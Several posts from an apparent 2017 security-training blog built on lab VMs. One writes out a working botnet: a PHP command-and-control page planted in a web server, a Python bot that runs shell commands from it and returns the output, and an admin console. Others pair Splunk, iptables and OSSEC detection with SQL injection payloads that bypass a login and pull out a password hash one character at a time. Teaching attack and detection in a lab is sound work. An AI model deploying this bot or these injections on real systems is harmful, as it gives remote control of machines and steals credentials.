Wednesday, November 29, 2017

Prepare, Bait, Hook, Execute and Control - Phishing

This post is one of four that I am planning to write about social engineering specifically about phishing.  The form of phishing that I am going to talk about is where an email is sent to a user, a link or an attachment is in the email, it entices a user to click the link or open the attachment, executes a payload and then it provides control of the infected computer.

To explore this topic, I am going to start by going through the process backwards.  I am going to start by first exploring how the control of the infected computer occurs as it becomes a bot.

I am going to use the zico2 virtual machine as if it was a web server on the internet.  My host as the controller of the bots through the web server and then will simulate some infected computers that communicate to the web server.

1.  We are going to use PHPLiteAdmin to create a SQLite3 database called command.  Then a table called botInfo with 6 fields as shown below in the screenshot. 

 
2.  Walking through the table, the machineID is the unique identifier of the bot, osType is whether it is linux or windows, httpCommand is the command that is pending to be run on the bot, httpResults are the results of the command, and executed if the httpCommand was executed.

3.  If you observe the permissions of the view.php file under /var/www the zico account has access to modify the file.  You need to figure out how to login with the zico account to continue with this exercise. 


4. Through the previous walkthrough we identified that the www-data user is being utilized to run the website.  With the above permissions this user also has the ability to modify the website.

Challenge: Correct the permissions so that the pages will still load but the www-data does not have permission to write to the www directory, the files and any directories.


5.  Let's modify the view.php file to be used as the file for our command and control (C2) server.



Below is the code that is above with exception to the first and last lines.  You may need to reformat the code as you copy it out.


        if ($_GET['page']) {
                $page =$_GET['page'];
                include("/var/www/".$page);
        }
        elseif ($_GET['action']) {
                $action=$_GET['action'];
                if ($action=='getCommand') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=getCommand&mID=test
                        $machineID=$_GET['mID'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = 'SELECT id, httpCommand FROM botInfo WHERE machineID="' . $machineID . '" AND executed="N" LIMIT 1';
                        $results = $db->query($query);
                        if (count($results) > 0) {
                                while ($row = $results->fetchArray()) {
                                        echo $row[0] . "|" . $row[1];
                                }
                        }
                        else {
                                echo "Nothing";
                        }
                }
                elseif ($action=='addBot') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=addBot&mID=test27
                        $machineID=$_GET['mID'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = "INSERT INTO botInfo (machineID, httpCommand, executed) VALUES('" . $machineID . "','" . base64_encode('ls') . "','N')";
                        echo $query;
                        $results = $db->exec($query);
                        echo "Added";
                }
        }
        elseif ($_POST['action']) {
                $action=$_POST['action'];
                if ($action=='postCommand') {
                        # Example to test with: curl -d "action=postCommand&mID=test&id=1&httpResults=test9" -X POST http://172.16.216.132/view.php
                        $machineID=$_POST['mID'];
                        $id=$_POST['id'];
                        $httpResults=$_POST['httpResults'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = 'UPDATE botInfo SET httpResults="' . $httpResults . '", executed="Y" WHERE id=' . $id . ' AND machineID="' . $machineID . '"';
                        $results = $db->exec($query);
                        echo "Completed";
                }
        }
        else {
                echo "view.php?page=tools.html";
        }

6.  Quickly I will step through the code above.  The page initially would allow you to pass the parameter of page with the tools.html file.  This could also be used to conduct directory traversal to access files throughout the file system that the www-data user could read.

We added if the parameter action with the value of getCommand and mID (machineID) was passed then we would query the sqlite3 database for the 1st command that needed to be executed on the infected host.  Then return it as if it was the web page viewed in a web browser.  Remember information passed as a GET parameter, will by default show in the logs of the web server.

The other action is to add a new bot to the database.  This is if a new computer comes on that is infected with our proof-of-concept executable.

The second section is if the POST parameter of action with it being postCommand, would indicate the bot executed the given command and is returning through the httpResults the results of the command.  Then return as a web page that the action was "Completed".

7.  Well that was simple.  Let's move on.  We are now going to create the bot, this would be proof-of-concept code that would run on an infected computer to control it.  I am going to utilize python. 

8. Below is the code for a python bot that will communicate with the PHP page called view.php. 




#!/usr/bin/python
# Building this bot to only work with linux
# Built for educational use only...

import base64
import hashlib
import random
import datetime
import urllib
import urllib2
import time
import subprocess

c2server="http://172.16.216.132/view.php"
sleepTime = 10 # Sleep for 10 seconds between requests going to the c2server

def generateMachineID():
 # This function generates a random machine ID based on the time and a random number
 machineID = str(datetime.datetime.now()) + str(random.randint(1,10000)) 
 machineID = hashlib.sha1(machineID).hexdigest() # Will return as machineID
 return machineID

def addBot(mID):
 # This function adds the bot to the C2Servers SQLite3 database
 url = c2server + "?action=addBot&mID=" + mID
 urllib2.urlopen(url).read()

def getCommand(mID):
 # This function gets the next command from the C2 to execute
 url = c2server + "?action=getCommand&mID=" + mID
 u = urllib2.urlopen(url)
 i = u.read()
 info = i.split("|")
 print "Received - Task ID: " + info[0] + "\tCommand: " + base64.b64decode(info[1])
 return info[0], info[1]

def execCommand(c):
 # This function takes the command it received and eecutes it
 c = base64.b64decode(c)
 comExec = subprocess.Popen(str(c), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
 STDOUT, STDERR = comExec.communicate()
 if STDOUT:
  encodedOutput = base64.b64encode(STDOUT)
 else:
  encodedOutput = base64.b64encode("Invalid Command...")
 return encodedOutput

def postCommand(mID, tID, r):
 # This function returns to the c2server the results of the command
 url = c2server
 data = urllib.urlencode({'action' : 'postCommand',
     'mID' : mID,
     'id' : tID,
     'httpResults' : r})
 u = urllib2.urlopen(url=url, data=data)

def main():
 machineID = generateMachineID() # Generate a random machine identifier
 addBot(machineID)  # Communicate to the C2 Server and Add this bot
 while True:   # Don't exit until program fails
  time.sleep(sleepTime) # Wait for the specified time 
  taskID, command = getCommand(machineID) 
  if base64.b64decode(command)=='Nothing':
   time.sleep(sleepTime*3)
  else:
   time.sleep(sleepTime)
   results = execCommand(command)
   time.sleep(sleepTime)
   postCommand(machineID, taskID, results)

if __name__ == "__main__":
 main()        

To talk through the code.  It generates a unique machine ID, then adds the bot machine ID to the database housed on the site, gets a command if it exists, executes the command and then posts the results back to the site.

9.  The bot if configured correctly will persist on the system and be triggered to start or restart based on a scheduled task or an action taken by the user.

10.  Awesome, now we need an administration script to manage what commands we want the bots to execute, fetch the results and remove the tasks from the SQLite3 database to keep it cleaned out.  This will require us to add to the view.php page and build a new python script to conduct the actions.

Below is the python script for the administration of the bots through view.php.




#!/usr/bin/python
# Building this utility to only work with linux
# Built for educational use only...

import base64
import urllib
import urllib2

c2server="http://172.16.216.132/view.php"
sleepTime = 10 # Sleep for 10 seconds between requests going to the c2server
log = open('log.txt','a')

def getExecuted():
 # This function gets the machine IDs that are in the database
 url = c2server + "?action=getExecuted"
 u = urllib2.urlopen(url)
 i = u.read()
 items = i.split('|')
 if items[1] == "Nothing":
  print "No commands executed to be return..."
  return "Nothing"
 else:
  print "Task ID: " + items[0] 
  print "Bot ID: " + items[1]
  print "$> " + base64.b64decode(items[2])
  print base64.b64decode(items[3])
  print
  # Record to a log file for future reference...
  log.write("BotID: " + items[1] + "\n")
  log.write("?> " + base64.b64decode(items[2]) + "\n")
  log.write(base64.b64decode(items[3]) + "\n\n")
  return items[1]
 return "Nothing"
 
def selectBot(botList):
 count = 1
 for b in botList:
  print str(count) + ". " + b
  count=count+1
 print
 select = raw_input("> ");
 botNumber = int(select) - 1
 return botList[botNumber]

def sendCommand(b):
 command = raw_input("Command> ")
 url = c2server + "?action=sendCommand&mID=" + b + "&httpCommand=" + base64.b64encode(command) 
 urllib2.urlopen(url).read()
 print
 print "Sent the command: " + command
 
def purgeOld():
 url = c2server + "?action=purge"
 urllib2.urlopen(url).read()
 print
 print "Sent command to purge old information."

def main():
 bots = []
 botSelected = 'None'
 while True:
  print
  print "C2 Server URL: " + c2server
  print "1. Get Executed Commands"
  print "2. Select Bot - Currently Selected: " + botSelected
  print "3. Send Command to Execute"
  print "9. Purge Old Commands"
  print "Q. Quit"
  print
  selection = raw_input("> ")
  if selection == "1":
   newBot = getExecuted()
   if newBot <> "Nothing":
    if newBot not in bots: 
     bots.append(newBot)
     print "Added bot: " + newBot
  elif selection == "2":
   botSelected = selectBot(bots)
  elif selection == "3":
   sendCommand(botSelected)
  elif selection == "9":
   purgeOld()
  elif selection.lower() == "q":
   log.close()
   exit(0)

if __name__ == "__main__":
 main()        


To walk through the above code.  You are presented with a menu.  If bots are running you can retrieve the executed commands.  The command is displayed and logged if available.  Then you can select the bot and then send commands back to the database to be executed.  You can also purge old commands.

11.  Now that we have a script to administrate the bots, let's add to the view.php file the following 3 sections underneath the addBot elseif.




                 elseif ($action=='sendCommand') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=sendCommand&mID=test27&httpCommand=dddd
                        $machineID=$_GET['mID'];
                        $command=$_GET['httpCommand'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = "INSERT INTO botInfo (machineID, httpCommand, executed) VALUES('" . $machineID . "','" . $command . "','N')";
                        $results = $db->exec($query);
                        echo "Added Command";
                }
                elseif ($action=='getExecuted') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=getExecuted
                        $db = new SQLite3('/usr/databases/command');    
                        $query = "SELECT count(*) FROM botInfo WHERE executed='Y' LIMIT 1";     
                        $results = $db->query($query);
                        while ($row = $results->fetchArray()) {
                                $rows = $row[0];                # Calculate the rows returned by the query
                        }
                        if ($rows > 0) {                        # If number of rows is greater than 0 then continue
                                $taskID = 0;
                                $query = "SELECT id, machineID, httpCommand, httpResults FROM botInfo WHERE executed='Y' LIMIT 1";
                                $results = $db->query($query);
                                while ($row = $results->fetchArray()) {
                                        echo $row[0] . "|" . $row[1] . "|" . $row[2] . "|" . $row[3];
                                        $taskID = $row[0];
                                }
                                $query = "UPDATE botInfo SET executed='D' WHERE id=" . $taskID;
                                $results = $db->exec($query);
                        }
                        else {
                                echo "Nothing|Nothing|Nothing|Nothing";
                        }
                }
                elseif ($action=='purge') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=purge
                        $db = new SQLite3('/usr/databases/command');
                        $query = "DELETE FROM botInfo WHERE executed='D'";
                        $results = $db->exec($query);
                        echo "Purged";
                }       

To walk through the above commands added to view.php.  Send command is where the admin console sends in a command to be run by a specific bot or machineID.

The getExecuted action is to gather and return commands that have been executed.

Then the action of purge will purge the rows in the database that have been executed and returned to the admin console.

12.  Now let's test our proof-of-concept.  I am using my host to launch a program called "Terminator".  Terminator allows you to split the window into multiple terminal windows.  Below are screenshots of the admin console and 4 bots running on my host simulating a small botnet.  Also what the SQLite3 database looks like.

The 4 bots communicating:


The admin console communicating with the 4 bots through the web page:


What the SQLite3 database looks like:


13.  Now that we can simulate a botnet let's see what it looks like in Splunk as the logs from the web server are read by the forwarder.

Challenge:  Setup the botnet with a simulation of 4 bots, the zico2 vulnerable web server and an admin console.

Challenge:  Setup the Splunk Forwarder to send the logs to a Splunk Server docker instance.  Study the logs and identify the bot activity.

14.  Understanding that if a web site if compromised a miscreant may change files.  This is where a file integrity monitor (FIM) solution is helpful.  On of the many tools is called OSSEC.  You can setup OSSEC to record a log file and then the Splunk Forwarder can send the logs.

Challenge: Setup OSSEC to watch the /var/www directory for file changes.  Change view.php and then resave it and verify that the log detects it.

Challenge: Setup Splunk to receive the OSSEC logs.

The files that were created above can be pulled from my Github page located at here.

Challenge: What is pivoting, as it is defined in penetration testing?

Challenge: If you had the access that the bot has what would you look for to escalate privileges.

The goal of the post is for you to understand how a botnet may function, how a C2 Server may function and then tools and techniques that you can use to detect a bot or detect when a site has been compromised.

Friday, November 24, 2017

Docker with Splunk and Seattle 0.0.3 Walkthrough

For this post, I am going to quickly walk through the setup of Splunk using a docker image, refer to the previous post for detail on how to do this.  With Splunk configured I am going to go back to the walk-through of Seattle 0.0.3, configure the logs to come in, and then we are going to go through the walk through and see what logs are being generated.

The goals of this post are:
1.  To show how analysts could detect the attack occurring using a SIEM
2.  To show what the attack/walkthrough would look like in a SIEM
3.  To learn about additional tools that you can use to conduct or mitigate the attack.

Lab

1. In the previous post I walked through setting up a docker image called splunk/splunk and installing a Splunk Forwarder on the vulnerable image I was working with.  I am going to conduct the same with the Seattle 0.0.3 vulnhub VM.

2. My setup quickly is a VM running Kali Linux (172.16.216.130) with docker running.   I am running the docker image for Splunk (172.17.0.2) on Kali.  The networking on the Kali VM is setup to be host-only.  From my linux host I can reach the 172.16.216.130 VM.  I am going to use the hosts IP Address and NAT the ports I need for Splunk.  On the Kali VM I have ssh enabled and connecting with the "-X" option to be able to X11 forward everything to my host.

Command on Kali to Start SSH: /etc/init.d/ssh start
Command on Host to Forward X11: ssh -X root@172.16.216.130

4.  Then I started the docker service and loaded the splunk image.

Command: service docker start
Command: docker run -it -p 172.16.216.130:8000:8000 -p 172.16.216.130:9997:9997 splunk/splunk

5.  Then I load as a second VM the Seattle 0.0.3 (172.16.230.131).  Observe that this VM is 64 bit.  I need to transfer the Splunk Forwarder to this VM.  In the previous post I used Secure Copy using SSH.  In this post I am going to use a Python SimpleHTTP Web Server to host the files and then pull them from the Seattle VM.  I use this method to transfer or load files occasionally when I am working on vulnerable images.

First: Navigate to the directory of where the files are that you need to host in a simple web server.  In the below example I have a folder called Splunk with the 32 and 64 bit splunk forwarders.  Observe that this VM is built on Fedora 64bit so you need the rpm package of the Splunk Universal Forwarder.  The Simple Server will serve all of the files in the given directory.

Command: python -m SimpleHTTPServer
Note: You can follow the command with a specific port number.  By default it serves the files on port 8000.



6.  Pull the file that you need from the Seattle 0.0.3 virtual machine using bash.  Assuming you have root on the Seattle VM through SSH.  I built a script in bash to demonstrate using native bash commands to download the file.  You can really simplify the below script if you need to...

Challenge: Create the script, change permissions, execute it, and download the Splunk Universal Forwarder for Fedora/Red Hat.


7.  The VM has a keyboard layout is for a GB keyboard layout.  You can change this by modifying 2 files listed below, however as an attacker if you do make the change make sure you change it back.  I often find that attackers do a fair job in cleaning-up but often miss these small things that they change.  Google how to change the keyboard layout in Fedora as part of the challenge.

/etc/locale.conf
/etc/vconsole.conf

8. Install the Splunk Universal Forwarder.

Command: rpm -ivh sf.rpm


9.  After Splunk is installed setup the forwarding server to the Splunk docker image on the Kali VM (172.16.216.130) that has the ports NATed.

10.  Enable logging for queries in the MariaDB server that is running.



11.  Then restart the service in Fedora for the mariadb server.

Command:  systemctl restart mariadb.service

12.  Now add the following files so that the Splunk Universal Forwarder can send them to the Splunk server running on the Kali VM.

/var/log/mariadb/error.log
/var/log/mariadb/query.log
/var/log/httpd/access_log

13.  Before we move on, let's work with the iptables firewall that is running to generate logs of the activity.  On this VM in the /root home directory is a script called "shieldsup.sh".  We are going to copy and then modify that script to keep it simple.

Command: cp shieldsup.sh v2.sh



14.  Modify the v2.sh file with adding logging into the script that will configure the iptables firewall.  Below is how I modified it.  The firewall could be simplified both by consolidating the logging policies and using bash foor loops.


15.  The logs for the firewall will show inside of the file /var/log/messages.  If you were to capture a few of them, below is a screenshot of what you would see.


16.  Setup the Splunk Universal Forwarder to also read and send these logs to the Splunk server: /var/log/messages.  Below is a scrennshot of the monitors I have enabled for the Seattle 0.0.3 VM.


17.  Run a nmap scan on the Seattle VM to verify you are receiving logs.  Also verify the script you wrote for the firewall logging is executed.

18.  Verfiy in Splunk that you are receiving the iptables, httpd and mysql logs.


19.  Now going to the walkthrough, let's start by scanning with netcat.


20.  Use the Splunk Search like you would conduct a google search.  Run the following search:

Search: index=main DPT=76

Search the main index of Splunk and then search for the string DPT=76 amongst the logs.  DPT is an abbreviation of destination port.  You should see the results of the search similar to what is below.  In step 19 we scanned destination port 76.


21.  You can also do conditional statements in your searches.  For example if I wanted to see the logs that were generated of scans going to the destination ports of 76 and 77.

Search: index=main (DPT=76 OR DPT=77)



22.  Now we are going to request the home page of the web site using netcat.

Command: nc 172.16.216.131 80
String: GET / HTTP/1.0

23.  Looking in Splunk we see the following logs.  After we search specifically for the log source of /var/log/httpd/access_log

Search: index=main source="/var/log/httpd/access_log"


 
Looking closer at the log normally where the user-agent is you see a "-".  If you have a web application firewall or another method to filter by a <blank> user-agent you could block this scan.  (Apache Web Server has filtering capabilities that could be utilized also.)

24.  Now we are going to use OWASP dirbuster and hit the home page.  Observe that each hit records a log entry.  Also in the user-agent you can see, we are utilizing OWASP Dirbuster.


Challenge: Identify how to change the user-agent in dirbuster.

25.  Let's configure iptables to observe the new connections coming into the firewall on port 80.  If the connection is NEW and hits the firewall 5 times within 120 seconds then log and drop the connection.

Change the firewall script on the Seattle 0.0.3 VM and set it.  Pay particular attention to how the LOG-ACCEPT-INPUT-NEW policies are created.  I copied the previous firewall script to a new one, so if I had to I could revert to it.

Note:  If you make changes to the firewall script, you need to run ./shieldsdown.sh and then ./v3.sh to reset the counters maintained by iptables that the IP Address should be blocked.



26.  If the firewall is setup and functioning correctly you should see that dirbuster observed multiple timeouts while it was scanning, due to it being blocked.  Dirbuster will now pause and wait.


27.  If you search in Splunk you will see the behavior of the connection to change from LOG ACCEPT INPUT NEW to LOG DROP INPUT. 

Search: index=main DPT=80


28.  Let's specifically look at the Splunk logs for /var/log/httpd/access_log.  I modified the user-agent to have a unique user-agent.  Notice the search only returns a scan that resulted in 303 logs verses a potential of thousands of logs.  Also in the search I specified the log source and a string to search for that would be unique in the logs. 

Search: index=main source="/var/log/httpd/access_log" "DirBuster-1.0-RC1-iptables-test2"


Being able to search using an attackers IP Address, a unique user-agent or other information that you can find is unique about an attack is worth gold in finding an attacker and what they have done.  You can also associate multiple IP Addresses to an attack that is occurring.

On the attackers side, you should try and stay hidden.  Learn how to decrease the amount of generated traffic and learn how to fit in with existing traffic.  I have heard this called "flying beneath the radar" or trying not to draw attention to yourself.

29.  The next step in attacking the Seattle 0.0.3 VM was to fuzz the password of the user. 

Challenge:  Fuzz the password for the admin user and observe if the iptables rules that we put in-place above will mitigate this attack also.

30.  The next item was to create stored XSS in a post to the blog after you log in as admin. 

Challenge:  Create a search in Splunk to identify XSS by searching for the keyword script or alert.











Monday, November 20, 2017

Docker with Splunk and Billu B0x forwarding Apache2 and mysql logs

For this post, I am going to walk through the setup of Splunk using a docker image.  With Splunk configured I am going to go back to the walk-through of Billu b0x, configure the logs to come in, and then we are going to go through the walk through and see what logs are being generated.

The goals of this post are:
1.  To show how analysts could detect the attack occurring using a SIEM
2.  To show what the attack/walkthrough would look like in a SIEM
3.  To learn what you could change in the attack/walkthough to be more stealthy in the methods utilized and how tools are used

Lab

1.  On my Kali box where docker is installed, start the service.

Command: service docker start

2.  Then search for docker images for the keyword "splunk"

Command: docker search splunk

3.  The image that I selected is called splunk/splunk.  So I am going to pull down that image.  We are trying to get version 7 of splunk.

Command: docker pull splunk/splunk

4.  After pulling the image we are going to run it.  However, prior to doing that, Splunk uses port 8000 for the web interface and also needs port 9997 for a splunk forwarder (agent) to send logs to the server. (The ports can be changed.)  With the docker image installed on Kali, the image will receive by default a 172.17.0.2 IP Address.  Billu_b0x will be in a virtual machine that will not have access to that IP Address unless we associate the ports to the IP Address of Kali.  To do that, use the -p command line switch to indicate the IP Address you want to bind to, the listening port on that IP Address forwarded to the port on the image.

Command: docker run -it -p 172.16.216.130:8000:8000 -p 172.16.216.130:9997:9997 splunk/splunk


5.  When the image loads it will have you agree to the End-User License Agreement.  After it completes loading then it will display a blinking cursor.  Use the key combination of Ctrl <p> <q> to exit out of the image while leaving it running.

6.  Because we associated the Splunk web interface with an IP Address that the host of my Kali VM can get to, let's navigate to the splunk login page on port 8000.  (You should change the password, but remember being a docker image you will loose everything when you kill the instance of the image.

URL: http://172.16.216.130:8000



7.  Then setup a receiver to listen on port 9997.  Click settings in the top right, then select forwarding and receiving.  Then click add new to receive data.  Insert port 9997 for the default port.



8.  Now, we need to load the Billu_b0x VM.  If you do not know the root password, go back and work through the VM and figure out the password.  Go ahead and login to the console and start the SSH server.

Command: /etc/init.d/ssh start

9.  Connect to the VM from the host through SSH.  This will simplify the configuration.

Command: ssh root@172.16.216.129

10.  Download the "Universal Splunk Forwarder" to the host.  This VM requires the 32 bit deb package.  After you download the file, similar to this, splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb, copy this over to the Billu_b0x VM.

11. In a new terminal window, let's copy the file over to the VM.  To do this you can use WinSCP on windows or scp on Linux.  I am going to demonstrate using scp. 

Command:  scp splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb root@172.16.216.129:/root

Walking through the command, secure copy the file by using the account of root to the IP Address listed and place the file in the /root directory.

12.  Then go back to the SSH session you established on step 10.  Then install the splunk forwarder.

Command:  dpkg -i splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb

13.  Now that the forwarder is installed, we need to configure it so send logs to 172.16.216.130:9997 or the Kali box on port 9997 which then sends it to the docker image of splunk.

Command: /opt/splunkforwarder/bin/splunk add forward-server 172.16.216.130:9997


14. Verify the forward-server is configured.

Command: /opt/splunkforwarder/bin/splunk list forward-server

You shoud see it listed under inactive forwarders.  Don't worry about this yet.

15.  Now you need to add which files or directories you would like to send to Splunk.  The main reason you want to send your logs to a SIEM or central location is a miscreant will tamper with them or delete them on the box.

16.  Let's add the logs for the apache2 server for the access.log and the error.log.

Command:  /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/access.log

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/error.log



17.  Now that we have configured the forwarder to send logs to the server and what logs to send to the server, let's start the splunk forwarder.

Command:  /opt/splunkforwarder/bin/splunk start splunkd


18.  After this is started you may have to wait about 2-5 minutes but then navigate in Splunk to the search box.  In the search query, type index=main and search for the last 24 hours.  You should see the logs.

19.  To generate some logs I created a simple batch script to get the home page of Billu-b0x every tenth of a second for up to 2000 times.  I ran the script from the host.



20.  If all is setup correctly, click splunk in the top-left, click app search and reporting, then in the new search insert "index=main".  You should see the logs coming in, indicating the host is "indishell".


21.  Notice that the wget tool will identify itself in what is called the user-agent.  The user-agent will describe the tool, browser, operating system and other plugins associated with the connecting device to a web server.

22.  With the tool wget you can control the user-agent that is passed.  In the terminal window I specified the user-agent to be "Hello!", then executed it.  I researched the logs and found the log entry that I caused with the tool.


23.  As a penetration tester you should understand what your tools look like in the logs.  As defenders you should know about what these tools produce and should look through logs for anomalies or unique user-agents to detect interesting activity.

24.  In the Billu b0x walk through we used nikto and dirb.  Below I am going to run both tools and we are going to look at the logs to see what is produced from the tools.

Command: nikto -h 172.16.216.129
Command: dirb http://172.16.216.129 /usr/share/wordlists/dirb/big.txt 


Before... 2,002 logs recorded


After nikto... 18,414 logs recorded (Observe the user-agent)



After dirb... 89,683 logs recorded (Observe the user-agent)



Challenge: Can you change the user-agent that is passed with nikto or dirb?

Challenge: Use Splunk to search the logs.  Try and find HTTP code 200 or web sites that exist that were accessed by Nikto or dirb.

25.  Now we are going to setup MySQL to log queries to a file and setup the splunk forwarder to collect those logs.  Login as root to Billu b0x and change to /etc/mysql and modify the my.cnf file.

Command: cd /etc/mysql
Command: vim my.cnf


26.  Scroll-down in the file to the section on "Logging and Replication".  Remove the comment or the "#" in front of "general_log_file" and "general_log".  Then save and exit from vim "<esc> :wq".


27.  Now add the file "/var/log/mysql/mysql.log" to the splunk files to be monitored, also add the error.log.

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/mysql.log

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/error.log



28.  After configuring the logging of mysql, attempt to login then use splunk to view the query to the database of the username and password.  Notice the search is specific to the mysqld log.

Search: index=main sourcetype=mysqld


29.  The query is logged and now the username and password for the user is in the logs.  Working with a SIEM you need to understand what is in the logs.  Another example is when a query contains a SSN or a credit card number.  Be aware of when this information could be gathered by a SIEM.

Developers should return as results sensitive information but be careful querying for it directly.  For example, you can query for the password of the admin user.  Then with the user input for the password and the returned password compare them and verify they match.  That is after you check to verify if the user exists in the database.

30.  As an ethical hacker or a penetration tester you may want to test your attack in a lab prior to performing it.  I also like to test for vulnerabilities with a proxy and logging enabled.  This helps me to analyze my attacks and how I have to change them to be more effective.

Challenge:  Continue working through the Billu b0x walk through.  Use burp suite and see if you can see in the logs that you are using it as a proxy.




Wednesday, November 15, 2017

Docker with Juiceshop - Focus on SQL Injection

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub or docker images to refresh my knowledge on the tools that can be used.  Also, to provide step-by-step walk-through exercises that students can follow.

Previous Posts that can assist with this Walkthrough
1. Billu_b0x - Highlights a Local File Inclusion vulnerability
2. Seattle - Highlights Brute Forcing a Login and XSS
3. Zico2 - Highlights directory traversal and PHP Command Injection
4. Docker with WolfCMS and MySQL Images
5. Exploitation of WolfCMS using Command Injection and usage of Web Shells

Tools Used:
VMware Workstation 12 Player
PuTTY or SSH client on host computer
Kali Linux Distro VM (Downloaded the VM edition from kali.org)

1 - docker
2 - docker image called bkimminich/juice-shop

Lab
1. Start the docker service running on Kali that we previously loaded.

Command: service docker start

2. Search docker hub for the bkimminich/juice-shop image and then pull it.

Command: docker search juice-shop
Command: docker pull bkimminich/juice-shop

* Remember that the image is as is and should be trusted as such...

3. After you have pulled the image, go ahead and load it.

Command: docker run -it bkimminich/juice-shop
Command: Ctrl <p> <q> to leave it running and go back to the console

4. Juice-Shop runs on port 3000.  From my host I am going to connect through SSH and use X11 Forwarding.

Command: ssh -X root@172.16.214.134

5. With X11 Forwarding I will launch 3 different terminals.  In the first terminal I am going to execute "firefox", second to execute "owasp-zap" and third as a command line to be utilized.  The below screenshot shows the 3 terminals, 1 loading firefox, with firefox and owasp open.


6.  With juice shop loaded and working through a proxy we are going to look for a SQL injection vulnerability.  In the top-left corner of Juice-Shop click on login.  You should be presented with the following screen.


7.  I am going to put in a legitimate email and a test password and click login.  You should see the error message of "Invalid email or password".  Now let's check what the OWASP Zap Proxy recorded as the request.


8.  Notice in the above request the information sent in a POST request is in JSON format.  This format shows the parameter and then following the colon the value that is sent.  Let's attempt some SQL injection on the username.  Type in the following for the username and the password.

Username: admin@admin.com' OR '1'='1'--;
Password: test



9. You should see that the page treats the username and password as a correct combination and allows the login.  What we are doing is changing the SQL statement and ending it with the --;.  This prevents the password from being read and tricks the application into authenticating the user because 1 does equal 1.

10.  Let's use the proxy to take the request, use the manual request editor and then test some more SQL injection.   To open the Manual Request Editor it is located under Tools...  After it loads you can delete the text and then copy what you see in the previous screenshot or the request and copy it into the Manual Request Editor.

11.  Now that we can manually adjust the request we can conduct SQL Injection and receive a HTTP code of 200 if it worked or HTTP code of 401 if it did not.  I am going to try and execute a SQL function called test() to see what results we receive back through the proxy.  I am expecting an error to show.

JSON: admin@admin.com' OR '1'=test('1')--;

12.  Below is the error that is received.  We can learn the structure of the query that we are tampering with, how we can take advantage of it and the database that is running.



13. We can see the above query that is being executed is as shown below. 

SQL: SELECT * FROM Users WHERE email = '<userinput>' AND password = '<hashed input>'

14. Now we are going to use SQL injection to identify the emails in the database that we can use to login.  If we receive a HTTP response code of 200 we will receive an email address.  If we receive another code then an email will not be returned.

JSON inject: admin@admi.com' OR 'a'=substr(email,1,1)--;

So reflecting back on the SQL statement in step 13 we are saying SELECT everything FROM the Users table where the email is admin@admi.com (which does not exist) or with a is equal to the first character returned from the email. 
Click "Send" on the Manual Request Editor.



15. The response comes back with an "HTTP/1.1 200" code which means it successfully authenticated and then it displays the email address of "admin@juice-sh.op".


16.  Let's try and find an email that starts with another letter of the alphabet.

JSON inject: admin@admi.com' OR 'b'=substr(email,1,1)--;



17. The response came back with the email address of "bender@juice-sh.op".  What if multiple emails start with the letter "a".  You could inspect the email for 2 characters that match the first 2 letters of the email.

JSON inject: admin@admi.com' OR 'be'=substr(email,1,2)--;

To gather all of the emails in the database you could cycle through all of the letters of the alphabet.  What I would do is build a python script to conduct this activity however, my next step is to gather the password for the admin@juice-sh.op email account.

18.  Let's modify the injection to begin guessing what the password is based on if we receive an HTTP/1.1 200 response code.

JSON inject: admin@juice-sh.op' AND 'a'=substr(password,1,1)--;
HTTP/1.1 401 Unauthorized

JSON inject: admin@juice-sh.op' AND 'b'=substr(password,1,1)--;
HTTP/1.1 401 Unauthorized

JSON inject: admin@juice-sh.op' AND 'c'=substr(password,1,1)--;
HTTP/1.1 401 Unauthorized

JSON inject: admin@juice-sh.op' AND 'd'=substr(password,1,1)--;
HTTP/1.1 401 Unauthorized
...
JSON inject: admin@juice-sh.op' AND '0'=substr(password,1,1)--;
-- Passing the number zero.
HTTP/1.1 200 OK

19. So we now understand that the password begins with the number zero or '0'.  Let's move on and figure out the next character of the password.  We are unsure at this time if it is a hash, encrypted, or in plain-text.


JSON inject: admin@juice-sh.op' AND '00'=substr(password,1,2)--;
-- Passing the number zero two times.
HTTP/1.1 401 Unauthorized

JSON inject: admin@juice-sh.op' AND '01'=substr(password,1,2)--;
-- Passing the number zero and a one.
HTTP/1.1 200 OK

20. Now we understand that the password starts with a zero and a one, or '01'.  Then we can move onto the next character.  This is a very long process if we are to do it manually.  Let's use the OWASP ZAP fuzzing feature to speed this process up for us.

21. First let's use a program on Kali called crunch to generate a wordlist that starts with '01'.

Command: crunch 3 3 -t 01% - Generates a wordlist with numbers 0-9
Command: crunch 3 3 -t 01@ - Generates a wordlist with letters a-z

You can view the man page of crunch by executing "man crunch".  The -t option starts each word with '01' and then appends a number with the '%'.  If you want to append a lower-case letter then use the '@'. Upper-case letters then use the ','.




23. Back to the manual request editor and modify the JSON inject to look at the first 3 characters of the password.

JSON inject: admin@juice-sh.op' AND '010'=substr(password,1,3)--;
-- Passing the number zero, one and then 0.
HTTP/1.1 401 Unauthorized

24. Go back to the main window in Zap, scroll down in the history until you find the last entry that you sent in step 23.   Then, highlight the 010 and right-click and click on fuzz.


25. We are now going to set the payload to use the 3char-list.txt file and click "Start Fuzzer".  After the fuzzer is complete, click on the column heading under Fuzzer of code, then scroll to the top, and then click on the first entry.  You should see the code is 200 which means the injected query was successful.  This then allows us to see the 3rd character of the password is the number 9.


26.  Keep working with the above process to figure out the password for the admin@juice-sh.op account.

Challenge: Write a script to do the exact same process but in a more automated way.

Challenge: What is the password for the admin@juice-sh.op account?

Challenge: What is the password for the other accounts in the database?

27.  After doing the above process for a while you will be able to extract the full hash of the password used by the admin@juice-sh.op account.  One reason in a pentest you do not want to reset the admin account because it may cause interruptions.

